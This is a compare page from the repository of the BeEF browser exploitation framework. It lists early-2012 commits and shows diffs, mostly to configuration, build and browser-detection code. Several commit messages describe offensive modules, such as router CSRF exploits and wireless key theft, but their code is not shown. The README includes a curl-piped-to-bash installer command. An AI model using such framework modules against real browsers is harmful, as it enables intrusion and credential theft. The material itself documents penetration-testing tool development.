Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Hiddenden:beef-0.4.3.1
Branches Tags
Hiddenden:master Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1
..
compare: Hiddenden:beef-0.4.3.3
Branches Tags
Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:master Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1

121 Commits
beef-0.4.3 ... beef-0.4.3

Author SHA1 Message Date
Keith Lee
e528375e3d Save wireless configuration xml created by Get_wireless_keys module to temp folder 2012-04-02 14:40:32 -04:00
antisnatchor
1db9ccaff6 Merge branch 'master' of https://github.com/beefproject/beef 2012-03-31 14:12:52 +01:00
antisnatchor
2db4885c2f Added comments in the main Router class. 2012-03-31 13:57:18 +01:00
antisnatchor
5474f0507a Allowing also GET method on Access-Control-Allow-Methods (dynamic handler). 2012-03-31 13:27:59 +01:00
antisnatchor
59ac216b71 Added basic web-server imitation (overriding Server response headers, added config.yaml options). 2012-03-31 13:24:30 +01:00
antisnatchor
addc256b8c Remove route "/" from the main router class. Must return 'not found' anyway. 2012-03-29 15:00:20 +02:00
antisnatchor
b88acd98c8 Added BeEF router superclass: it will be extended by other classes when sub-routes are needed. 2012-03-29 14:24:15 +02:00
bcoles
2bca21a41d Minor updates to XSSRays 
Part of issue #47
 2012-03-26 16:29:15 +10:30
bcoles
8518c8fae9 Renamed History Extraction module to Get Visited Domains 
Added 4 links for Firefox
 2012-03-26 14:44:36 +10:30
bcoles
b230b98336 Changed BeEF::API.registered?() to use the :is_matched_params method 
Fixes issue #500
 2012-03-25 14:13:44 +10:30
antisnatchor
e4a7019192 Merge branch 'master' of https://github.com/beefproject/beef 2012-03-24 18:43:57 +01:00
bcoles
45475d625b Updated IE version detection 
No longer modifies the DOM for every call to:
	`isIE8()`
	`isIE9()`
	`isIE()`
 2012-03-22 19:27:36 +10:30
antisnatchor
f0fab1c431 Added rest-client gem dependency when running tests 2012-03-16 11:12:10 +01:00
bcoles
5329d5c147 Added support for Firefox 11 2012-03-16 13:11:20 +10:30
bcoles
e52779e72e Fixed javaEnabled() in BeEF hook 
- It was breaking the hook in IE6

Also fixed a couple of typos in the Local File Theft module description
 2012-03-16 12:40:13 +10:30
antisnatchor
5e2de7d378 reverted http.debug to false 2012-03-15 18:37:53 +01:00
Michele Orru
11fbeb3296 Merge pull request #643 from antisnatchor/master 
RESTful API, from antisnatchor with love :D
 2012-03-15 10:33:17 -07:00
antisnatchor
99fff273fe removed old reference to dynamic_module table 2012-03-15 13:58:37 +01:00
antisnatchor
61efe56b10 Removed classes and requires of dynamic* tables. Not used anymore. 2012-03-15 13:56:48 +01:00
antisnatchor
4e224e63ee added example on how to call metasploit modules with the REST api 2012-03-15 13:53:29 +01:00
antisnatchor
5c96fe2b84 changed return value on override_execute, reformatted code for the metasploit api 2012-03-15 13:32:10 +01:00
Christian Frichot
6541d9fa34 Tidied up some of the Console Shell output handling - Issue #642 2012-03-15 19:52:03 +08:00
Christian Frichot
2bc6a0d8a9 Rick roll module, changed to a different YouTube vid, that appears to work here. Issue #620 2012-03-15 19:43:02 +08:00
Christian Frichot
4f1042a6a3 QRCode extension - minor update to handle the Console in the Core - Issue #641 2012-03-15 19:39:24 +08:00
antisnatchor
8db7ef00b4 Fixed error when attaching to MSF (resetdb? is not there anymore) 2012-03-15 12:25:38 +01:00
antisnatchor
fec922a63c Implemented /api/modules/ to retrieve all enabled modules 2012-03-14 16:52:25 +01:00
antisnatchor
8fdd127f17 Disabled Sinatra exception, and set the custom 404 response to 'not found.' 2012-03-14 16:26:29 +01:00
Graziano Felline
b02bdbaaa7 ISSUE 625 - corrected the bug. Added li's elements poison 2012-03-14 15:41:10 +01:00
Graziano Felline
8795c5770a ISSUE 625 - corrected the bug. Added li's elements poison 2012-03-14 15:34:46 +01:00
antisnatchor
c3a611d12e Implemented info/options retrieval for a specific module throught the REST API 2012-03-13 17:18:13 +01:00
antisnatchor
434f9f8e43 Now it's possible to launch command modules via the REST api (also with options), and then get execution results. 2012-03-13 12:43:10 +01:00
antisnatchor
837c1f2db8 Modified BeEF::Module.execute to return the command_id of the persisted command, instead of just returning a boolean. Refactored usages in the code as well. 2012-03-13 12:40:28 +01:00
antisnatchor
3674f06609 Implemented /api/logs and /api/logs/hb_session, added code comments 2012-03-12 17:40:38 +01:00
antisnatchor
818f3d207e Retrieving correct browser version with browserDetails BrowserVersion 2012-03-12 17:14:09 +01:00
bcoles
b11502cc84 Added BT Home Hub CSRF module 2012-03-13 00:54:25 +10:30
bcoles
f38c7e5615 Removed "HasJava" from hook initialization 
Updated Get Wireless Keys module description
 2012-03-13 00:50:03 +10:30
bcoles
6ef889b0b1 Removed Java from hook initialization: 
- Removed has_java
	- Removed internal_ip
	- Removed internal_hostname

Added function `beef.browser.javaEnabled()`

Patched function `beef.browser.hasJava()`
	- should no longer break the hook in Chrome/Safari

Added `not_working` browsers to History Extraction module
 2012-03-13 00:19:01 +10:30
antisnatchor
4429ab3df2 Added /api/hooks logic to retrieve online and offline HBs as json 2012-03-12 12:46:04 +01:00
antisnatchor
03cd06a014 Added stubs and registered classes for the 3 main RESTful API endpoints: hooks, modules, logs 2012-03-12 11:55:26 +01:00
antisnatchor
872272645e Added api_token for RESTful api authentication 2012-03-12 10:27:03 +01:00
bcoles
9735a7b66f Merge branch 'master' of https://github.com/beefproject/beef 2012-03-12 11:41:08 +10:30
milo2012
51d6aaa515 Merge remote-tracking branch 'origin/master' 2012-03-12 00:53:07 +08:00
milo2012
5cb1ad3d53 Module for Issue 639 - Retrieving Clear Text Wireless Keys from Compromised Systems 2012-03-12 00:50:02 +08:00
milo2012
daa37293fe Fix Issue 88 - Working for IE and Firefox 2012-03-11 11:57:19 -04:00
root
847b798e0a Fix Issue 88 - Working for IE and Firefox 2012-03-11 11:40:10 -04:00
antisnatchor
7dab21ff7f First skeleton for the RESTful api using Sinatra (modular approach, not classic one). 2012-03-11 16:12:59 +01:00
antisnatchor
e1652bf52e Added sinatra dependency to bundler Gemfile 2012-03-11 10:51:43 +01:00
radoen
a0c11fa695 Added support to intercept dynamic requests 2012-03-11 10:26:56 +01:00
Keith Lee
f2401d3f39 Issue 86 - Working for Firefox. Support for Chrome+Opera+IE still pending. 2012-03-11 10:26:56 +01:00
asaafan
76e881dce9 Delete Skype XSS stub from main branch 2012-03-11 10:26:56 +01:00
unknown
ea199f5c55 Adding stub for Skype XSS module 2012-03-11 10:26:56 +01:00
asaafan
05b7eab56c Delete Skype XSS stub from main branch 2012-03-09 01:46:11 +02:00
bcoles
11870710e8 Added a couple of 0day CSRF exploits for Zenoss Core <= 3.2.1 2012-03-08 20:28:38 +01:00
unknown
dbd6baa7b0 Temporary fix to prevent hook error on Safari. I will implement a final fix tomorrow. 2012-03-07 16:19:06 +01:00
bcoles
c1975691f4 Added a couple of 0day CSRF exploits for Zenoss Core <= 3.2.1 2012-03-07 15:02:12 +10:30
antisnatchor
8c3afcf2b9 Minor changes related to Java detection with the unsigned applet: if the browser is Chrome, we simply rely on window.navigator. 2012-03-06 19:56:58 +01:00
Michele Orru
03604a7e93 Merge pull request #632 from milo2012/master 
Fixes Issue 567: if browser != Chrome, an unsigned java applet is injected in the DOM to verify if Java is really enabled and working.
 2012-03-06 10:44:34 -08:00
Keith Lee
cc9756cf59 Fix for issues 567 and also remove multiple calls to beef.browser.hasJava() from /beef/core/main/client/net/local.js 2012-03-07 01:46:51 +08:00
Keith Lee
97672966df Fix for issues 567 and also remove multiple calls to beef.browser.hasJava() from /beef/core/main/client/net/local.js 2012-03-07 01:41:27 +08:00
Saafan
3bd06ebf82 Merge pull request #631 from asaafan/master 
Testing Fork/Merge
 2012-03-05 07:51:04 -08:00
Saafan
c1ad9d7b04 Testing fork/merge 2012-03-05 17:47:14 +02:00
Michele Orru
2796e384b3 Merge pull request #630 from milo2012/master 
changes to command.rb and commands.rb so that that @datastore[cid'] , @datastore['results'] and @datastore['beefhook'] can be called from the modules
 2012-03-05 01:37:19 -08:00
Keith Lee
95f7e92011 Changes to command module and get_physical location so that @datastore['cid'] , @datastore['results'] and @datastore['beefhook'] can be called from the modules 2012-03-05 03:40:46 +08:00
antisnatchor
698e01bb83 reverted back test_contants definition. 2012-03-04 16:36:08 +01:00
antisnatchor
08d50512e9 Added bootstrap unit tests. 2012-03-04 16:22:37 +01:00
antisnatchor
e9a6049e58 Fixes issue 621: Added 2 new command line options. Now it's psosible to specify a different config.yaml file. Also changed the core load order, adding a new bootstrap module. 2012-03-04 14:55:03 +01:00
Wade Alcorn
3f06f6db18 Commented yaml bug fix 2012-03-04 22:12:04 +10:00
Wade Alcorn
487227b945 Version updated 2012-03-04 22:11:21 +10:00
Wade Alcorn
6c7624805c Update delay to test jenkins 2012-03-04 21:46:03 +10:00
bcoles
753299e758 Updated Get Page HTML module: 
o Now returns head and body in one beef.send() request
o Now stores results correctly
 2012-03-04 20:24:04 +10:30
bcoles
0485a1ab7e Added 3x router CSRF exploits: 
o Comtrend CT5367
o Comtrend CT5624
o D-Link DSL500T
 2012-03-04 14:55:00 +10:30
Christian Frichot
52d06e40a2 Removed the dev/null output in the Rake Install task Issue #629 2012-03-03 22:44:05 +08:00
bcoles
5c678a2550 Added cleanup() function to router exploits 
Removed `username:password@` portion of example target URLs as
unfortunately this triggers warnings in most modern browsers. The
modules target CSRF vulnerabilities and it's expected and
acceptable behaviour to rely on the user having an authorized session by
default.

"Advanced users" will be familiar with the `username:password@` trick
and can add it to the URL if they desire.
 2012-03-03 20:43:56 +10:30
Christian Frichot
63805d943d The Console Shell now allows you to drop into an IRB (and then play with the BeEF object if you want) Issue #627 2012-03-03 14:59:59 +08:00
Ben Waugh
302bb27212 Revert 041ed2b47a27655cad360397b6ca43401a027504^..HEAD 2012-02-28 09:01:29 +10:00
Ben Waugh
041ed2b47a Jenkins Test Change 2012-02-28 07:32:02 +10:00
Wade Alcorn
df0458d62e Merge branch 'master' of github.com:beefproject/beef 2012-02-26 21:35:25 +10:00
Wade Alcorn
275bbfaad2 Updates to test jenkins 2012-02-26 21:35:03 +10:00
antisnatchor
e7dd04977e Added getPhysicalLocation module written by @keith55. Adjusted config.yaml description and browser support. 2012-02-26 09:53:16 +01:00
bcoles
b6ce0cf611 Updated Detect Firebug module description 2012-02-22 20:10:38 +10:30
bcoles
fd7cee3c5c Fixed typo in logger unit test 2012-02-22 19:07:07 +10:30
bcoles
b52c3d7d19 Added unit test stubs for proxy, requester and event logger extensions. 
Fixes issue #29
Fixes issue #30
Fixes issue #33

Created a unit test stub for logger (as opposed to event_logger) to
differentiate between the main Logs tab and the event logs for each
zombie.
 2012-02-22 19:00:48 +10:30
Wade Alcorn
ec48e2647f Minor update to trigger test server 2012-02-21 06:08:15 +10:00
Wade Alcorn
5118429cb5 Overkill test for test server 2012-02-20 21:02:46 +10:00
Wade Alcorn
d010bd6d9e Extend wait time between login tests 2012-02-20 17:46:12 +10:00
bcoles
cda1659356 Improved proxy error handling. Fixes issue #92. 
The proxy now dies somewhat gracefully when given a malformed request.

The `Content-Length' header is now only matched by the parser if its
value is an integer.

A request with a null or missing HTTP version in the header now defaults
to HTTP/1.0

A request with a null or missing `Host' header returns:
  `ERROR: CrossDomain Request. The request was not sent.'
regardless of whether the host is specified in the URL.
 2012-02-19 03:42:20 +10:30
bcoles
d50b07ac56 Added Unhook module. Fixes issue #525. 2012-02-18 19:10:02 +10:30
bcoles
a9e276f50a Added Detect Firebug module. Fixes issue 497 
Moved Detect Software module from Browser to Host category
 2012-02-18 17:43:20 +10:30
Christian Frichot
791b34863e Renamed / tidied up some of the config. See Issue #82 2012-02-18 10:06:47 +08:00
Mike Haworth
fd15c108a2 Merge branch 'master' of github.com:beefproject/beef 2012-02-18 14:17:34 +13:00
Mike Haworth
5e138395d4 Partial fix for issue #100, now detects build version of flash 2012-02-18 14:17:12 +13:00
Christian Frichot
15932efcb3 Made some minor adjustments to 'os' key rating in core/module.rb. See issue #72 2012-02-18 09:06:46 +08:00
Mike Haworth
106e2dbd2d added detect software module 2012-02-18 12:22:17 +13:00
Wade Alcorn
56a9c4d04d Changed version number 2012-02-16 20:30:48 +10:00
Wade Alcorn
55b80d3b6d Merge branch 'master' of github.com:beefproject/beef 2012-02-16 08:23:39 +10:00
bcoles
8ecfa3578f Merge branch 'master' of https://github.com/beefproject/beef 2012-02-16 02:52:38 +10:30
antisnatchor
2715e0400c added browser type,version and OS to console output when a new browser is hooked in BeEF 2012-02-15 16:01:47 +01:00
Ben
667d00351d Updated README instructions for MAC OS X 2012-02-15 16:01:46 +01:00
Ben
3ad2dbb3c7 Rake task to generate DMG image 2012-02-15 16:01:46 +01:00
antisnatchor
5bc6745e03 Fixed issue 66: base64'ed the iframe src in case of Chrome/Safari to bypass the webkit anti-XSS filter 2012-02-15 16:01:46 +01:00
antisnatchor
58f2b4f7a1 Added detection of Chrome 17 2012-02-15 16:01:45 +01:00
bcoles
e5aa0671a1 Removed "notes:" node from three module config.yaml files 2012-02-15 16:01:45 +01:00
Christian Frichot
4a92d3174c Removed extended_in_modules code. See Issue #147 2012-02-15 16:01:45 +01:00
antisnatchor
61763ff103 commented out require of selenium gem. not needed and throws errors on Mac OSX 2012-02-15 16:01:45 +01:00
Saafan
e8d7293350 Listening to loopback only. Fixes issue #594 2012-02-15 16:01:44 +01:00
bcoles
805e8c8af1 Added fingerprints to Fingerprint Network module 2012-02-15 16:01:44 +01:00
Wade Alcorn
1d7ad568d2 Minor formatting update 2012-02-15 16:01:44 +01:00
antisnatchor
9489e3c591 moved imap ipec modules in a proper directory, added a note to imap ipec module about portbanning. 2012-02-15 16:01:43 +01:00
antisnatchor
d9104b93f4 removed console.log function calls that were throwing errors on IE 2012-02-15 16:01:23 +01:00
antisnatchor
55b52427e8 re-added panel.removeAll when generating a newExploitPanel, corrected typo on function name genExistingExploitPanel 2012-02-15 16:00:57 +01:00
antisnatchor
1d74d7eeab Fixed a serious bug in beef.net.request when sending cross-domain POST data. jQuery is automatically changing the method to GET if the dataType (that was hardcoded in our code) is set to 'script'. 2012-02-15 16:00:38 +01:00
antisnatchor
74d176ff73 Fixed issue 34: now only one zombie tab is created (current browser). When switching between browsers, the previous zombiePanel is destroyed. 2012-02-15 16:00:14 +01:00
Ben
def8677f1c Updated README instructions for MAC OS X 2012-02-15 17:52:54 +10:00
Ben
02bed661bb Rake task to generate DMG image 2012-02-15 17:52:08 +10:00
antisnatchor
c6988befc5 Fixed issue 66: base64'ed the iframe src in case of Chrome/Safari to bypass the webkit anti-XSS filter 2012-02-12 13:45:35 +01:00
antisnatchor
aefd251c17 Added detection of Chrome 17 2012-02-12 11:49:38 +01:00
bcoles
591cef0732 Removed "notes:" node from three module config.yaml files 2012-02-09 23:01:14 +10:30
Christian Frichot
0178a41676 Removed extended_in_modules code. See Issue #147 2012-02-07 21:24:02 +08:00
antisnatchor
476c2d0636 commented out require of selenium gem. not needed and throws errors on Mac OSX 2012-02-07 02:03:34 +01:00
Saafan
f20fd9e797 Listening to loopback only. Fixes issue #594 2012-02-06 12:00:08 +02:00
bcoles
ec0dacce28 Added fingerprints to Fingerprint Network module 2012-02-01 23:11:05 +10:30
161 changed files with 3625 additions and 1025 deletions
Expand all files Collapse all files

1
.gitignore vendored
View File

@@ -1,2 +1,3 @@
beef.db
test/msf-test
custom-config.yaml

3
Gemfile
View File

@@ -25,6 +25,7 @@ else
end
gem "thin"
gem "sinatra", "1.3.2"
gem "ansi"
gem "term-ansicolor", :require => "term/ansicolor"
gem "dm-core"
@@ -48,6 +49,8 @@ if ENV['BEEF_TEST']
# sudo apt-get install libxslt-dev libxml2-dev
# sudo port install libxml2 libxslt
gem "capybara"
#RESTful API tests/generic command module tests
gem "rest-client", "~> 1.6.7"
end
source "http://rubygems.org"

52
Gemfile.lock
View File

@@ -1,52 +0,0 @@
GEM
remote: http://rubygems.org/
specs:
addressable (2.2.6)
ansi (1.4.1)
daemons (1.1.5)
data_objects (0.10.7)
addressable (~> 2.1)
dm-core (1.2.0)
addressable (~> 2.2.6)
dm-do-adapter (1.2.0)
data_objects (~> 0.10.6)
dm-core (~> 1.2.0)
dm-migrations (1.2.0)
dm-core (~> 1.2.0)
dm-sqlite-adapter (1.2.0)
dm-do-adapter (~> 1.2.0)
do_sqlite3 (~> 0.10.6)
do_sqlite3 (0.10.7)
data_objects (= 0.10.7)
erubis (2.7.0)
eventmachine (0.12.10)
json (1.6.4)
librex (0.0.52)
msfrpc-client (1.0.1)
librex (>= 0.0.32)
msgpack (>= 0.4.5)
msgpack (0.4.6)
parseconfig (0.5.2)
rack (1.4.0)
term-ansicolor (1.0.7)
thin (1.3.1)
daemons (>= 1.0.9)
eventmachine (>= 0.12.6)
rack (>= 1.0.0)
PLATFORMS
ruby
DEPENDENCIES
ansi
data_objects
dm-core
dm-migrations
dm-sqlite-adapter
erubis
eventmachine (= 0.12.10)
json
msfrpc-client
parseconfig
term-ansicolor
thin

9
README
View File

@@ -53,8 +53,13 @@ Most of the contents of this file will eventually be added to /install.rb. In th
4. Prerequisites (Mac OSX)
Make sure you have XCode installed - which provided the sqlite support BeEF needs
Sqlite support is native in MacOS 10.6+
- XCode: provides the sqlite support BeEF needs
- Ruby 1.9
To install RVM and Ruby 1.9.3 on Mac OS:
$ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile
$ rvm install 1.9.3-p0 --with-gcc=clang
$ rvm use 1.9.3
5. Install instructions

19
Rakefile
View File

@@ -56,7 +56,7 @@ task :msf => ["install", "msf_install"] do
end
task :install do
sh "export BEEF_TEST=true;bundle install > /dev/null"
sh "export BEEF_TEST=true;bundle install"
end
################################
@@ -135,3 +135,20 @@ file '/tmp/msf-test/msfconsole' do
sh "cd test;git clone https://github.com/rapid7/metasploit-framework.git /tmp/msf-test"
end
################################
# Create Mac DMG File
task :dmg do
puts "\nCreating Working Directory\n";
sh "mkdir dmg";
sh "mkdir dmg/BeEF";
sh "rsync * dmg/BeEF --exclude=dmg -r";
sh "ln -s /Applications dmg/";
puts "\nCreating DMG File\n"
sh "hdiutil create ./BeEF.dmg -srcfolder dmg -volname BeEF -ov";
puts "\nCleaning Up\n"
sh "rm -r dmg";
puts "\nBeEF.dmg created\n"
end

2
VERSION
View File

@@ -14,4 +14,4 @@
# limitations under the License.
#
0.4.3.1-alpha
0.4.3.3-alpha

35
beef
View File

@@ -24,7 +24,7 @@ if RUBY_VERSION < '1.9'
puts "\n"
puts "Ruby version " + RUBY_VERSION + " is no longer supported. Please upgrade 1.9 or later."
puts "OSX:"
puts "sudo port install ruby19 +nosuffix"
puts "See Readme"
puts "\n"
exit
end
@@ -41,15 +41,26 @@ end
# @note Require core loader's
require 'core/loader'
# @note Starts configuration system
config = BeEF::Core::Configuration.instance
# @note Initialize the Configuration object. Eventually loads a different config.yaml if -c flag was passed.
if BeEF::Core::Console::CommandLine.parse[:ext_config].empty?
config = BeEF::Core::Configuration.new("#{$root_dir}/config.yaml")
else
config = BeEF::Core::Configuration.new("#{$root_dir}/#{BeEF::Core::Console::CommandLine.parse[:ext_config]}")
end
# @note After the BeEF core is loaded, bootstrap the rest of the framework internals
require 'core/bootstrap'
# @note Loads enabled extensions
BeEF::Extensions.load
# @note Prints the BeEF ascii art if the -a flag was passed
if BeEF::Core::Console::CommandLine.parse[:ascii_art] == true
BeEF::Core::Console::Banners.print_ascii_art
end
# @note Prints BeEF welcome message
#BeEF::Extension::Console::Banners.print_ascii_art
BeEF::Extension::Console::Banners.print_welcome_msg
BeEF::Core::Console::Banners.print_welcome_msg
# @note Loads enabled modules
BeEF::Modules.load
@@ -75,8 +86,7 @@ case config.get("beef.database.driver")
end
# @note Resets the database if the -x flag was passed
# @todo Change reference from Extension::Console to Core::Console once the console extension is merged with the core
if BeEF::Extension::Console.resetdb?
if BeEF::Core::Console::CommandLine.parse[:resetdb]
print_info 'Resetting the database for BeEF.'
DataMapper.auto_migrate!
else
@@ -94,10 +104,13 @@ http_hook_server = BeEF::Core::Server.instance
http_hook_server.prepare
# @note Prints information back to the user before running the server
BeEF::Extension::Console::Banners.print_loaded_extensions
BeEF::Extension::Console::Banners.print_loaded_modules
BeEF::Extension::Console::Banners.print_network_interfaces_count
BeEF::Extension::Console::Banners.print_network_interfaces_routes
BeEF::Core::Console::Banners.print_loaded_extensions
BeEF::Core::Console::Banners.print_loaded_modules
BeEF::Core::Console::Banners.print_network_interfaces_count
BeEF::Core::Console::Banners.print_network_interfaces_routes
#@note Prints the API key needed to use the RESTful API
print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"
# @note Call the API method 'pre_http_start'
BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)

9
config.yaml
View File

@@ -16,14 +16,14 @@
# BeEF Configuration file
beef:
version: '0.4.3.1-alpha'
version: '0.4.3.3-alpha'
debug: false
restrictions:
# subnet of browser ip addresses that can hook to the framework
permitted_hooking_subnet: "0.0.0.0/0"
# subnet of browser ip addresses that can connect to the UI
# permitted_ui_subnet = "127.0.0.1/32"
# permitted_ui_subnet: "127.0.0.1/32"
permitted_ui_subnet: "0.0.0.0/0"
http:
@@ -37,6 +37,11 @@ beef:
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
session_cookie_name: "BEEFSESSION"
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: false
#supported: apache, iis
type: "apache"
database:
# For information on using other databases please read the

3
core/api.rb
View File

@@ -60,10 +60,9 @@ module BeEF
# @param [String] method the method of the class
# @param [Array] params an array of parameters that need to be matched
# @return [Boolean] whether or not the owner is registered
# @todo Change the param matching to use the new :is_matched_params?() method - Issue #479
def registered?(owner, c, method, params = [])
@registry.each{|r|
if r['owner'] == owner and r['class'] == c and r['method'] == method and params == r['params']
if r['owner'] == owner and r['class'] == c and r['method'] == method and self.is_matched_params?(r, params)
return true
end
}

53
core/bootstrap.rb Normal file
View File

@@ -0,0 +1,53 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
end
end
## @note Include the BeEF router
require 'core/main/router/router'
require 'core/main/router/api'
## @note Include http server functions for beef
require 'core/main/server'
require 'core/main/handlers/modules/beefjs'
require 'core/main/handlers/modules/command'
require 'core/main/handlers/commands'
require 'core/main/handlers/hookedbrowsers'
# @note Include the network stack
require 'core/main/network_stack/handlers/dynamicreconstruction'
require 'core/main/network_stack/assethandler'
require 'core/main/network_stack/api'
# @note Include the distributed engine
require 'core/main/distributed_engine/models/rules'
## @note Include helpers
require 'core/module'
require 'core/modules'
require 'core/extension'
require 'core/extensions'
require 'core/hbmanager'
## @note Include RESTful API
require 'core/main/rest/handlers/hookedbrowsers'
require 'core/main/rest/handlers/modules'
require 'core/main/rest/handlers/logs'
require 'core/main/rest/api'

21
core/core.rb
View File

@@ -26,9 +26,6 @@ require 'core/main/models/hookedbrowser'
require 'core/main/models/log'
require 'core/main/models/command'
require 'core/main/models/result'
require 'core/main/models/dynamiccommandinfo'
require 'core/main/models/dynamicpayloadinfo'
require 'core/main/models/dynamicpayloads'
require 'core/main/models/optioncache'
# @note Include the constants
@@ -44,20 +41,8 @@ require 'core/main/crypto'
require 'core/main/logger'
require 'core/main/migration'
# @note Include http server functions for beef
require 'core/main/server'
# @note Include the command line parser and the banner printer
require 'core/main/console/commandline'
require 'core/main/console/banners'
require 'core/main/handlers/modules/beefjs'
require 'core/main/handlers/modules/command'
require 'core/main/handlers/commands'
require 'core/main/handlers/hookedbrowsers'
# @note Include the network stack
require 'core/main/network_stack/handlers/dynamicreconstruction'
require 'core/main/network_stack/assethandler'
require 'core/main/network_stack/api'
# @note Include the distributed engine
require 'core/main/distributed_engine/models/rules'

9
core/loader.rb
View File

@@ -38,11 +38,4 @@ require 'core/api'
require 'core/settings'
# @note Include the core of BeEF
require 'core/core'
# @note Include helpers
require 'core/module'
require 'core/modules'
require 'core/extension'
require 'core/extensions'
require 'core/hbmanager'
require 'core/core'

93
core/main/client/browser.js
View File

@@ -48,9 +48,8 @@ beef.browser = {
* Returns true if IE8.
* @example: beef.browser.isIE8()
*/
isIE8: function() {
$j("body").append('<!--[if IE 8]> <div id="beefiecheck" class="ie ie8"></div> <![endif]-->');
return ($j('#beefiecheck').hasClass('ie8'))?true:false;
isIE8: function() {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !!document.documentMode && !!window.XDomainRequest && !window.performance;
},
/**
@@ -58,8 +57,7 @@ beef.browser = {
* @example: beef.browser.isIE9()
*/
isIE9: function() {
$j("body").append('<!--[if IE 9]> <div id="beefiecheck" class="ie ie9"></div> <![endif]-->');
return ($j('#beefiecheck').hasClass('ie9'))?true:false;
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !!document.documentMode && !!window.XDomainRequest && !!window.performance;
},
/**
@@ -158,12 +156,28 @@ beef.browser = {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/10\./) != null;
},
/**
* Returns true if FF11.
* @example: beef.browser.isFF11()
*/
isFF11: function() {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/11\./) != null;
},
/**
* Returns true if FF12
* @example: beef.browser.isFF12()
*/
isFF12: function() {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null;
},
/**
* Returns true if FF.
* @example: beef.browser.isFF()
*/
isFF: function() {
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10();
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12();
},
/**
@@ -286,12 +300,20 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==16)?true:false);
},
/**
* Returns true if Chrome 17.
